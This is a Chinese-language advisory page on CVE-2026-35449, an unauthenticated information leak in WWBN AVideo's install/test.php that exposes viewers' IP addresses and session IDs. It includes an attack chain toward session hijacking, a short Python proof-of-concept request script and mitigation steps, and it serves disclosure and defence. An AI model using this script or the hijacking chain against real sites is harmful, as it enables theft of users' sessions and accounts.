IPBUF安全漏洞报告
English
CVE-2026-35449 CVSS 5.3 中危

CVE-2026-35449: AVideo信息泄露漏洞

披露日期: 2026-04-06

漏洞信息

漏洞编号
CVE-2026-35449
漏洞类型
信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WWBN AVideo

相关标签

信息泄露WWBN AVideo敏感信息暴露未授权访问Session Hijacking

漏洞概述

WWBN AVideo是一款开源视频平台。在其26.0及更早的版本中存在一处严重的安全配置缺陷。由于`install/test.php`诊断文件的CLI访问控制代码被注释掉,导致该文件在系统安装完成后仍可通过Web接口直接访问。未授权的攻击者无需登录即可利用此漏洞,获取包含用户IP地址、会话ID及User-Agent等敏感信息的统计数据,构成信息泄露风险。

技术细节

该漏洞的核心在于`install/test.php`文件的安全访问控制失效。在正常设计中,该脚本仅允许通过命令行(CLI)运行,用于系统诊断,通常包含`die()`或`exit()`语句来阻断HTTP请求。然而,在受影响版本中,开发者注释掉了这些保护机制。这使得攻击者能够绕过Web服务器的目录限制或应用层认证,直接向`/install/test.php`发送HTTP请求。服务器解析PHP脚本后,会输出内部统计信息。由于其中包含Session ID,攻击者不仅获取了用户隐私,还可能利用这些ID进行会话劫持攻击。通过劫持的有效会话,攻击者可以以受害者身份登录系统,若受害者为管理员,则可能导致整个平台被恶意控制。

攻击链分析

STEP 1
侦察
攻击者识别出目标站点使用的是WWBN AVideo平台,且版本可能低于或等于26.0。
STEP 2
漏洞利用
攻击者无需任何凭证,直接向服务器发送HTTP GET请求,访问路径`/install/test.php`。
STEP 3
信息获取
服务器返回诊断页面,泄露了当前活跃的视频观看者统计数据,包括IP地址和Session ID。
STEP 4
后续攻击
攻击者利用泄露的Session ID接管用户会话, potentially escalating privileges to administrator.

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (Replace with actual vulnerable host) target_url = "http://example.com/install/test.php" def check_poc(): try: # Send unauthenticated GET request to the exposed diagnostic script response = requests.get(target_url, timeout=10) if response.status_code == 200: print("[+] Vulnerability confirmed! The file is accessible.") print("[+] Response content snippet:") print(response.text[:500]) # Check for specific sensitive data indicators if "session_id" in response.text.lower() or "ip" in response.text.lower(): print("[!] Sensitive information (IP/Session) exposed in response.") else: print(f"[-] File returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": check_poc()

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施
建议立即检查服务器文件系统,删除或重命名`install/test.php`文件。同时,由于会话ID可能已泄露,应强制重置所有用户会话,要求用户重新登录,并审查服务器访问日志以确认是否有恶意访问记录。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表